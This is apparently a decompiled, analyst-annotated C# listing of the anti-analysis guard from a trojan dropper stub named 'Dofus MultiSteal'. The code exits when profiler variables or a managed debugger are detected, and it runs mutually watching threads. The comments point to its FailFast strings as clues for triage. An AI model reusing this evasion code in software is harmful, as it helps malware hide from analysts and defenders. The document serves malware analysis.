// Decompiled with JetBrains decompiler
// Type: ⟛礡✩ꏯ隨䫖<E99AA8>킎
// Assembly: Dofus MultiSteal 2 Stub, Version=2.4.7.1, Culture=neutral, PublicKeyToken=null
// MVID: FB10EBBA-F12D-4A39-9029-698DA5104FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.auty-fb61e5bf162b1ba51f1a122ca70c0a312ccdac7776ef8695adbfb94fbd2522c9.exe
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Threading;
// Analyst note: anti-analysis guard recovered from the decompiled stub. Type and member
// names are obfuscator-generated and are kept exactly as the decompiler emitted them so the
// listing stays comparable with other tooling output for the same sample.
//
// What the visible code does:
//   * terminates the process when either CLR profiler environment variable is set;
//   * runs two background threads that poll for a managed debugger and watch each other.
//
// Every termination path goes through Environment.FailFast with a fixed message string.
// FailFast is documented to record its message in the Windows Application event log, so the
// three strings used here ("Profiler detected", "Debugger detected (Managed)", "Loop broken")
// are worth searching for during triage of a host where this stub may have run.
internal static class \u27DB礡\u2729ꏯ隨䫖\uFFFD킎
{
  // P/Invoke declaration for ntdll!NtQueryInformationProcess.
  // No call site for it appears anywhere in this type.
  // NOTE(review): the "(Managed)" suffix in the debugger message further down hints that a
  // native-side check existed elsewhere or was stripped; unconfirmed from this listing.
  [DllImport("ntdll.dll", EntryPoint = "NtQueryInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
  private static extern int 鸬闰\uEB56㵐놽\uF06A墾㐠(
    IntPtr ProcessHandle,
    int ProcessInformationClass,
    byte[] ProcessInformation,
    uint ProcessInformationLength,
    out int ReturnLength);

  // P/Invoke declaration for ntdll!NtSetInformationProcess. Also unreferenced in this type.
  [DllImport("ntdll.dll", EntryPoint = "NtSetInformationProcess", CallingConvention = CallingConvention.StdCall, SetLastError = true, PreserveSig = false)]
  private static extern uint 碾왊溈莝舡䎸껈홫(
    IntPtr ProcessHandle,
    int ProcessInformationClass,
    byte[] ProcessInformation,
    uint ProcessInformationLength);

  // P/Invoke declaration for kernel32!CloseHandle. Also unreferenced in this type.
  [DllImport("kernel32.dll", EntryPoint = "CloseHandle", PreserveSig = false)]
  private static extern bool ꭍ㙸ሕ\u2E96\uFFFD\u0AF6繥߮(IntPtr hObject);

  // Entry point of the guard (public; its caller is outside this listing).
  //  1. Reads COR_ENABLE_PROFILING and COR_PROFILER and fails fast if either is present.
  //  2. Creates two background threads running the same watcher routine, hands each one the
  //     other as its argument, and starts them 500 ms apart.
  public static void 膒\uF296\u2595ꗫ燞\uFFDDﹱ蔙()
  {
    // The nested switch/goto is decompiler output. It is equivalent to:
    // "if either variable is non-null, call FailFast". Only presence is tested, not the
    // value, so an instrumented environment that merely defines one of them triggers the exit.
    switch (Environment.GetEnvironmentVariable("COR_ENABLE_PROFILING"))
    {
      case null:
        switch (Environment.GetEnvironmentVariable("COR_PROFILER"))
        {
          case null:
            break;
          default:
            goto label_1;
        }
        break;
      default:
label_1:
        Environment.FailFast("Profiler detected");
        break;
    }
    // Both threads run the same watcher method; each receives the other as its argument below.
    Thread parameter1 = new Thread(new ParameterizedThreadStart(\u27DB礡\u2729ꏯ隨䫖\uFFFD킎.䪕햰㯴濈ⷁ졥蜞洊));
    Thread parameter2 = new Thread(new ParameterizedThreadStart(\u27DB礡\u2729ꏯ隨䫖\uFFFD킎.䪕햰㯴濈ⷁ졥蜞洊));
    // Background threads do not keep the process alive once its foreground threads finish.
    parameter1.IsBackground = true;
    parameter2.IsBackground = true;
    parameter1.Start((object) parameter2);
    // The second watcher starts 500 ms after the first. Each watcher sleeps 1000 ms before its
    // first liveness check, so the first watcher's peer is expected to be running by then.
    Thread.Sleep(500);
    parameter2.Start((object) parameter1);
  }

  // Watcher routine executed by both background threads.
  // thread: the peer Thread object to monitor (boxed as object for ParameterizedThreadStart).
  // Polls roughly once per second and never returns normally. It either keeps looping or
  // ends the whole process through Environment.FailFast.
  private static void 䪕햰㯴濈ⷁ졥蜞洊(object thread)
  {
    Thread.Sleep(1000);
    Thread thread1 = (Thread) thread;
    while (true)
    {
      // Managed-debugger check: attached debugger, or a debugger with logging enabled.
      if (Debugger.IsAttached || Debugger.IsLogging())
        goto label_5;
label_1:
      // Peer liveness check: if the other watcher is no longer alive (for example because an
      // analyst suspended or killed it), the process is terminated with "Loop broken".
      if (!thread1.IsAlive)
        Environment.FailFast("Loop broken");
      Thread.Sleep(1000);
      continue;
label_5:
      Environment.FailFast("Debugger detected (Managed)");
      // FailFast terminates the process, so this jump back is control-flow residue from
      // decompilation rather than a path expected to execute.
      goto label_1;
    }
  }
}